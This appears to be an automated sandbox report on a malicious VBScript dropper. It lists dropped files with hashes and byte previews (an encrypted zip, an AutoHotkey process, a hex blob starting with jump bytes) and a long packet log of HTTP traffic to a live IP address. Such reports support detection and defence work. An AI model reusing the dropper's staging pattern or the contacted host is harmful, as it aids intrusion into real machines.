                                    SHA1:9C31734E88AAA19934CFD490A088D1D255103DB7
                                    SHA-256:51163C6EB169DFE30EBDBDC3193C25ECB264B7BD6E2E250BE9824563F383464F
                                    SHA-512:11479B5C09A3BB0B0216908895B7F6C6F6F640FC493B7463402CE796C3CD54BFCA8443E8889F5A4F352D830074C08C6E75035618EE17DB4F144023B853709BA6
                                    Malicious:false
                                    Reputation:low
                                    Preview:90E9B90300000053746E647241655266486A627759676E4F6F79634B425A524B526355557A65784A55544550424776786F684C744C516F6E7253697A45706376744771447155677A5A576963544F477A4A454248774D784E734270734461504758564F784F6E6D6566456164525179595951764F7942777056715A544E426C6543486D795A45746D7A5241436D4A4F65797957476A586D5575555871594E75577554764F65767949664269547452727A51427268594E6F7A554D5A4B426D6F51615A434D6C7357634C6F466865714F6F567079456E55735A706B644B6E634B50684B455642647962544647684D4F486154755371776F4A6D6F74704C44537576516467626B706E69515068736A76734A674E485A575952646D6F56536F575A497377746577555162475A6D6250616C4E744A46746B65506C744A705751645959717A6B6C764E6364676A66624158796942506A424D535676486C5A76654B4F6C426F65527454704D546765594C6A6B6D526177485A415A714E7449437A504A4E6469697944716D776D78496A726B74534E476469787667446B77666D59575575724F6D576C6C5A42724879495167556D636B794B4962554C6B796E655A6D7874566B4C6A4751626F63587067684841684A49456667526B7050796D77417772764C4B497564756C595A79625A4F5A564D5A706475

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fykbmgsz[1]

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):795674
                                    Entropy (8bit):7.994720720467439
                                    Encrypted:true
                                    SSDEEP:24576:iDv3cPduvcaRMi59YF7neQfxdIhjRT2Wrp:ij9kBi7kLeQydT2Wrp
                                    MD5:60817831FC3EA259D45C9A537172F080
                                    SHA1:BC6BE7D44565B13E1008A3B962ABC9BC6EE44217
                                    SHA-256:75D89FD4AA29E97E8859BDF734602490DA0F90A4FD5213F737857D971C82E80C
                                    SHA-512:02FC5B1202897E0D1D99FF636AB43B9D4BB6335F1FC538BD63D361B4025584F8196504F4366668DC919C1C8CB52EEA3742FDF8746748DAE00BEF4AF0C606EBDD
                                    Malicious:false
                                    Reputation:low
                                    Preview:PK........G/.X[...Y...b.......test.txt..W..8.6.-.7.i....y...dUi.[.n..gZ.4p........~..7u.....u:.w...x.N...v.....|z....z.....v.....]...x..n~.....;.....>].....8n.~.w...z.....i............I.jy{s;.R]....T..?.....N[........F.......?...|=...s..*w>o4.....:.N...7./.._....?=..6..w...t;..83.:.....^.'m\..;]=..Nm[..N.|.v.sxj.....&z.....7...qz.N.......n.{<.4.?.@.~:..Fk.....wZ=..........j."..5...-m....0I.....`fw..._z....y......g..dV@R...9|{r;\.{P=.m..=..cZ.e{z....U...(..s.........Q..v:.g...YS.....=X....p2sw.y..Y.khb\.cFs..........3.5..4=...fb.gp....`..?..b.o....k...m*........vw.K.............W}......8..%u...=}.7.3..qo..r..A...>R[...6....._'3..3...C.n..p...kj..g.6F|..;3...z...2CQ`.8.n.R..p..........SyP(*.C. .:...5|AQ.C.....q.......h..^.:.B.0i.3.w..j<..R..V<)...`Vj~.......@...P..d....u.Bh.,0............,.`Lf.Ld.-..o/.....Iy..>m.w.Y....+..3.F..[(...|..._(F3..................sj=.Z...6....)..Z.....`......./..xzW.pW=..Y<9|+...}s.}.j.. .....`....(.D..z..i.[

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Composite Document File V2 Document, Cannot read section info
                                    Category:dropped
                                    Size (bytes):6144
                                    Entropy (8bit):4.1077153913004825
                                    Encrypted:false
                                    SSDEEP:48:r8sPtL+1rVW0T1MqughNY1IkAKOSuPlQBSuH3kbTpadR1Im/BRQd2KuXb:BaNJ4ClbYdRyXdY
                                    MD5:9A88762EC6B39491DC41D1941A2FCA5F
                                    SHA1:92B4C534DEDD8BC4D8DA573303260621A8D8DCA1
                                    SHA-256:D9359A3F7860EACCB1696783DE2A4F94E6B83319C845EA5A5D5EC95DD669462E
                                    SHA-512:49F2F8EE5C25A8130190B5329150BB3B3BE769310B98BCCB646EED4BB0271472075B68F9CD8FBF0DBB1CE2E9D7B3BAF93C5807B402A0B024477A400F554E6BB2
                                    Malicious:false
                                    Reputation:low
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\heeeaAd

                                    Download File
                                    Process:C:\NwiQ\AutoHotkey.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):32
                                    Entropy (8bit):3.7775182662886326
                                    Encrypted:false
                                    SSDEEP:3:UD2kttQO:nkf1
                                    MD5:A3591CF79D32721C5ACC71515E4E18AC
                                    SHA1:DD6ABCC469EB58977455BE1AA654F6ABA4AC7FE2
                                    SHA-256:B6736240A09058D775703B3980744BAB11AA6A931C2761E8864C1E8E509F80D0
                                    SHA-512:12468CCF190CBBA47F01C2C4D43A0CB65C9E78845C6AA96B950984613339D1D70A2478B7443A2A04069C9F9BC2628ABC9E19F3889BE96774831CFEDF5193D664
                                    Malicious:false
                                    Reputation:low
                                    Preview:GbbAEfbKKeGcbHEHdhFKDKcaHBCBbaee

                                    Static File Info

                                    General

                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.049551124986586
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:ndvdikok.vbs
                                    File size:1'629 bytes
                                    MD5:32f61baa669991fb989439babaf493ff
                                    SHA1:4242d545077e3e643854e3148e00c8283533b9ab
                                    SHA256:75db6f949461cb03a155dd26c781a3c9e00edb917275f3b4d306b7094ed06a14
                                    SHA512:d20bf0b9a664caa9e9fe18dcb3899182b8f8bbb0275907bec6e3e888c0d2cd36a17ba24c49a3b92910ee075e6309aef5b8cf9392acf5833d66c0fbdcd3fdc2df
                                    SSDEEP:24:/seK+C6uS9ciJ+p/Mb2vwtIjAaAs3iQe1sLPbLsH+U/jlhJSf7V7iOtXYOcqVx3:/F1CT5i+xFljAaAZthJuVmOGOcqL3
                                    TLSH:4A31424EF4C7C14847F39AD8E0D28C18F2629007A23B8874BE4CE9862F354DCA2E596D
                                    File Content Preview:on error resume next..Function GenerateRandomString(ByVal length).. Dim characters, characterCount, randomString, i, position.... characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".. characterCount = Len(characters)..

                                    File Icon

                                    Icon Hash:68d69b8f86ab9a86

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 17, 2024 06:39:54.829952955 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:54.981851101 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:54.981991053 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:54.987380981 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.139170885 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488548994 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488569975 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488579988 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488586903 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488603115 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488614082 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488626957 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488640070 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488651037 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488662004 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.488810062 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.488810062 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.641962051 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.642024040 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.642045975 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.642081976 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.662386894 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662400961 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662410975 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662422895 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662436008 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662450075 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662461996 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662476063 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662487984 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662498951 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662540913 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662555933 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662571907 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.662597895 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.662597895 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.662597895 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.662656069 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.662656069 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.793950081 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.793967962 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.793978930 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.793991089 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.794002056 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.794013977 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.794018030 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.794025898 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.794038057 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.794125080 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.794125080 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.833893061 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.833909988 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.833915949 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.833926916 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.833933115 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.833939075 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.833950043 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834017038 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834062099 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834100008 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834115028 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834140062 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834146023 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834157944 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834170103 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834172010 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834184885 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834187031 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834197998 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834204912 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834212065 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834222078 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834224939 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834238052 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834247112 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834250927 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834264040 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834264040 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834276915 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834290028 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834290981 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834304094 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834315062 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834316969 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834326982 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.834328890 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834357023 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.834378958 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948004007 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948257923 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948378086 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948395967 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948407888 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948425055 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948436975 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948471069 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948544025 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948556900 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948571920 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948584080 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948586941 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948597908 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948611021 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948618889 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948622942 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948635101 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948647022 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948649883 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948663950 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948700905 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948700905 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948717117 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948846102 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948860884 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948872089 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.948899031 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948926926 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.948992968 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.949040890 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:55.985749960 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:55.985872030 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.006942034 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.006959915 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.006970882 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.006983042 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.006995916 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007008076 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007019997 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007030964 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007041931 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007065058 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007076979 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007080078 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007148027 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007152081 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007160902 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007170916 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007183075 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007194042 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007203102 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007208109 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007220984 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007221937 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007234097 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007246971 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007257938 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007261038 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007273912 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007286072 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007287025 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007296085 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007299900 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007314920 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007327080 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007328033 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007349968 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007353067 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007361889 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007374048 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007375956 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007389069 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007401943 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007415056 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007426977 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007430077 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007438898 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007438898 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007453918 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007467031 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007476091 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007479906 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007492065 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.007494926 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007519007 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.007548094 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100282907 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100303888 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100313902 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100320101 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100327015 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100332975 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100344896 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100358963 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100370884 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100383043 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100394011 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100405931 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100415945 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100426912 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100430012 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100438118 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100450993 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100461960 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100474119 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100475073 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100493908 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100506067 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100511074 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100522041 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100523949 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100565910 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100578070 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100593090 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100606918 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100617886 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100629091 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100629091 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100642920 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100650072 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100656033 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.100680113 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.100698948 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.179699898 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179740906 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179752111 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179759026 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179764986 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179776907 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179789066 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179800034 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179811954 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179850101 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179861069 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179869890 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.179873943 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179888964 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179902077 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179913044 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179920912 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.179924965 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179938078 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179945946 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.179950953 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.179966927 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.179991961 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180134058 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180145979 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180155993 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180166960 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180176973 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180183887 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180191040 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180201054 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180203915 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180213928 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180217981 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180224895 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180236101 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180247068 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180258036 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180259943 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180270910 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180283070 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180284977 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180296898 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180305004 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180313110 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180326939 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180334091 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.180339098 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180351019 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.180360079 CEST4973080192.168.2.4205.234.201.153
